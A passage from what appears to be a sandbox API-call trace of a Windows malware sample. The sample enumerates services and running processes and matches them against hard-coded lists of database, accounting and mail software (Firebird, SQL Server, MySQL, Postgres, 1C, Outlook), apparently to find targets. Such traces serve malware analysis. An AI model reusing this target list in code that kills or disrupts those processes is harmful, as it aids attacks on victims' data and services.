	[0048.652] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0048.652] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0048.652] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0048.652] lstrlenW (lpString="AudioSrv") returned 8
	[0048.652] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0048.652] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0048.652] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0048.652] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0048.652] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0048.652] lstrlenW (lpString="BFE") returned 3
	[0048.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0048.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0048.653] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0048.653] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0048.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0048.653] lstrlenW (lpString="CryptSvc") returned 8
	[0048.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0048.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0048.653] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0048.653] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0048.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0048.653] lstrlenW (lpString="CscService") returned 10
	[0048.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0048.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0048.653] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0048.653] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0048.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0048.653] lstrlenW (lpString="DcomLaunch") returned 10
	[0048.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0048.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0048.653] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0048.653] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0048.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0048.653] lstrlenW (lpString="Dhcp") returned 4
	[0048.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0048.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0048.653] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0048.653] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0048.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0048.653] lstrlenW (lpString="Dnscache") returned 8
	[0048.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0048.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0048.653] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0048.654] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0048.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0048.654] lstrlenW (lpString="DPS") returned 3
	[0048.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0048.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0048.654] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0048.654] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0048.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0048.654] lstrlenW (lpString="eventlog") returned 8
	[0048.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0048.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0048.654] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0048.654] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0048.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0048.654] lstrlenW (lpString="EventSystem") returned 11
	[0048.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0048.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0048.654] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0048.654] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0048.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0048.654] lstrlenW (lpString="gpsvc") returned 5
	[0048.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0048.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0048.654] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0048.654] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0048.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0048.654] lstrlenW (lpString="iphlpsvc") returned 8
	[0048.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0048.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0048.654] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0048.654] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0048.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0048.654] lstrlenW (lpString="LanmanServer") returned 12
	[0048.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0048.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0048.655] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0048.655] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0048.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0048.655] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0048.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0048.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0048.655] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0048.655] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0048.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0048.655] lstrlenW (lpString="lmhosts") returned 7
	[0048.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0048.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0048.655] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0048.655] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0048.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0048.655] lstrlenW (lpString="MMCSS") returned 5
	[0048.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0048.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0048.655] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0048.655] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0048.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0048.655] lstrlenW (lpString="MpsSvc") returned 6
	[0048.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0048.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0048.655] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0048.655] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0048.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0048.655] lstrlenW (lpString="Netman") returned 6
	[0048.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0048.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0048.655] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0048.655] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0048.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0048.656] lstrlenW (lpString="netprofm") returned 8
	[0048.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0048.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0048.656] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0048.656] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0048.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0048.656] lstrlenW (lpString="NlaSvc") returned 6
	[0048.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0048.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0048.656] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0048.656] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0048.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0048.656] lstrlenW (lpString="nsi") returned 3
	[0048.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0048.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0048.656] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0048.656] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0048.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0048.656] lstrlenW (lpString="PcaSvc") returned 6
	[0048.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0048.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0048.656] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0048.656] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0048.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0048.656] lstrlenW (lpString="PlugPlay") returned 8
	[0048.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0048.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0048.656] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0048.656] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0048.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0048.656] lstrlenW (lpString="Power") returned 5
	[0048.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0048.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0048.656] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0048.657] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0048.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0048.657] lstrlenW (lpString="ProfSvc") returned 7
	[0048.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0048.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0048.657] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0048.657] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0048.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0048.657] lstrlenW (lpString="RpcEptMapper") returned 12
	[0048.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0048.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0048.657] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0048.657] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0048.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0048.657] lstrlenW (lpString="RpcSs") returned 5
	[0048.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0048.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0048.657] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0048.657] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0048.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0048.657] lstrlenW (lpString="SamSs") returned 5
	[0048.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0048.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0048.657] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0048.657] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0048.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0048.657] lstrlenW (lpString="Schedule") returned 8
	[0048.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0048.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0048.657] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0048.657] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0048.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0048.657] lstrlenW (lpString="SENS") returned 4
	[0048.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0048.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0048.658] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0048.658] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0048.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0048.658] lstrlenW (lpString="ShellHWDetection") returned 16
	[0048.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0048.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0048.658] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0048.658] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0048.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0048.658] lstrlenW (lpString="Spooler") returned 7
	[0048.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0048.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0048.658] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0048.658] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0048.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0048.658] lstrlenW (lpString="swprv") returned 5
	[0048.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0048.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0048.658] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0048.658] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0048.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0048.658] lstrlenW (lpString="SysMain") returned 7
	[0048.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0048.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0048.658] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0048.658] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0048.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0048.658] lstrlenW (lpString="Themes") returned 6
	[0048.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0048.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0048.658] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0048.658] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0048.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0048.659] lstrlenW (lpString="TrkWks") returned 6
	[0048.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0048.659] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0048.659] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0048.659] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0048.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0048.659] lstrlenW (lpString="UxSms") returned 5
	[0048.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0048.659] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0048.659] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0048.659] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0048.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0048.659] lstrlenW (lpString="VSS") returned 3
	[0048.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0048.659] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0048.659] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0048.659] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0048.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0048.659] lstrlenW (lpString="WdiServiceHost") returned 14
	[0048.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0048.659] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0048.659] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0048.659] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0048.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0048.659] lstrlenW (lpString="WdiSystemHost") returned 13
	[0048.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0048.659] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0048.659] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0048.659] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0048.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0048.659] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0048.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0048.660] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0048.660] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0048.660] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0048.660] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0048.660] lstrlenW (lpString="Winmgmt") returned 7
	[0048.660] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0048.660] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0048.660] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0048.660] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0048.660] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0048.660] lstrlenW (lpString="WPDBusEnum") returned 10
	[0048.660] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0048.660] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0048.660] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0048.660] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0048.660] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0048.660] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4b70c0 | out: hHeap=0x7d60000) returned 1
	[0048.660] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x184
	[0048.663] Process32FirstW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0048.664] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0048.664] lstrlenW (lpString="System") returned 6
	[0048.664] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0048.664] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0048.664] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0048.664] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0048.664] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0048.664] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0048.664] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0048.664] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0048.665] lstrlenW (lpString="smss.exe") returned 8
	[0048.665] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0048.665] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0048.665] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0048.665] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0048.665] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0048.665] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0048.665] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0048.665] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0048.666] lstrlenW (lpString="csrss.exe") returned 9
	[0048.666] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0048.666] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0048.666] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0048.666] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0048.666] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0048.666] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0048.666] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0048.666] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0048.666] lstrlenW (lpString="wininit.exe") returned 11
	[0048.666] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0048.666] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0048.666] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0048.666] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0048.667] lstrlenW (lpString="csrss.exe") returned 9
	[0048.667] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0048.667] lstrlenW (lpString="winlogon.exe") returned 12
	[0048.667] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0048.668] lstrlenW (lpString="services.exe") returned 12
	[0048.668] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0048.668] lstrlenW (lpString="lsass.exe") returned 9
